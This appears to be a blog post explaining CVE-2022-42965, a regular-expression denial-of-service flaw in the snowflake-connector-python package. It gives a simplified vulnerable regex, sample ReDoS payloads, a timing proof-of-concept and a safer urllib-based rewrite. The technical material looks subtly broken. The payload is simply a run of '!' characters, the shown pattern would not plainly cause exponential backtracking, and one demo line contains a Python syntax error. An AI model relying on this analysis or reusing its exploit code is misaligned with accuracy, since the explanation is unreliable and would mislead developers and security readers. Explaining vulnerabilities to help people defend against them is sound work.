CVE-2022-42965 - How a Simple Regex Bug in snowflake-connector-python Leads to Exponential ReDoS

If you use the Snowflake database with Python, you probably rely on the snowflake-connector-python package, one of the most popular libraries for database interaction on PyPI. But what happens if a tiny bug inside it can take your server down? That’s exactly what CVE-2022-42965 is about: an exponential Regular Expression Denial of Service (ReDoS) vulnerability.

In this post, I’ll break down what went wrong, how the exploit works, and how you can protect yourself—using plain, non-technical English and easy-to-follow code snippets.

What is ReDoS, and Why Does It Matter?

ReDoS stands for Regular Expression Denial of Service. It happens when a vulnerable regex (regular expression) is used in a program, and a user can give especially-crafted input that makes this regex run *very* slowly—sometimes taking seconds or even minutes for a single string! This can freeze your app, destroy performance, or even let attackers completely DoS your service.

About the Vulnerable Method: get_file_transfer_type

In the snowflake-connector-python package, there's an _undocumented_ function called get_file_transfer_type(). While it wasn't meant for general use, if you could supply untrusted input to it (maybe by accident, or through a slip in your code), an attacker could easily cause a slowdown.

Inside this function is a problematic regular expression pattern—one that accidentally allows exponential backtracking.

The Vulnerable Code

Here’s a simplified version of the vulnerable code that existed in the snowflake-connector-python library:

import re

def get_file_transfer_type(name):
    # Vulnerable pattern - look at those (.*)
    # (simplified for illustration)
    pattern = r"^((.*)://)?(.*)$"
    match = re.match(pattern, name)
    if match:
        # Some logic using match.groups()
        return "parsed"
    return "unknown"

The function tries to parse URIs (like s3://bucket/file.csv), but it's too permissive: those (.*) groups with nested alternatives and repetition (*) create what's called a catastrophic backtrack scenario.

Suppose an attacker manages to pass carefully-crafted input like this

evil = "a" * 20 + "!" * 20 + "b"
get_file_transfer_type(evil)

But, to really cause trouble, the attacker provides input that causes the regex engine to try lots of possible matches—like:

# Example ReDoS payload
payload = '!' * 30 + '!' * 30 + '!'
get_file_transfer_type(payload)

This exponentially increases the number of checks the regex engine must perform. Even if the input is short, the matching takes a *ferociously long* time.

Real Exploit Example

Let’s see this in action. Try the code below—just don’t do this on production!

import re
import time

def slow_regex(name):
    pattern = r"^((.*)://)?(.*)$"
    start = time.time()
    # This is the vulnerable line
    match = re.match(pattern, name)
    took = time.time() - start
    print(f"Regex took {took:.2f} seconds for input of length {len(name)}")

# Small input, instant
slow_regex("https://snowflake.com";)
# Malicious input, BAD
evil_input = "!" * 30 + "!" * 30 + "!"
slow_regex(evil_input)

You’ll likely see the second call take much longer!

Why is This Dangerous?

- Remote attackers could trigger this by sending malicious data to any API or service that passes user input to get_file_transfer_type.
- Any code that ends up calling this method with untrusted input (directly or indirectly) is at risk.

Remember, the function is *undocumented*, but sometimes legacy apps or complex codebases accidentally expose such functions!

Here’s a safer rewrite

import urllib.parse

def get_file_transfer_type(name):
    parsed = urllib.parse.urlparse(name)
    # Now, no catastrophic backtracking!
    if parsed.scheme:
        return parsed.scheme
    return "unknown"


Let the urllib.parse module do the heavy lifting.

References and Further Reading

- NVD: CVE-2022-42965
- Original snowflake-connector-python commit diff
- OWASP: Regular expression Denial of Service - ReDoS
- Snowflake Issue Tracker

The Takeaway

A tiny regex in a hidden method almost no one knows about can still bring your system to a crawl. That’s the risk of ReDoS, and why keeping packages up-to-date and using safe parsing methods _matters_. Check your code, update your dependencies, and stay safe out there!

Timeline

Published on: 11/09/2022 20:15:00 UTC
Last modified on: 12/02/2022 22:46:00 UTC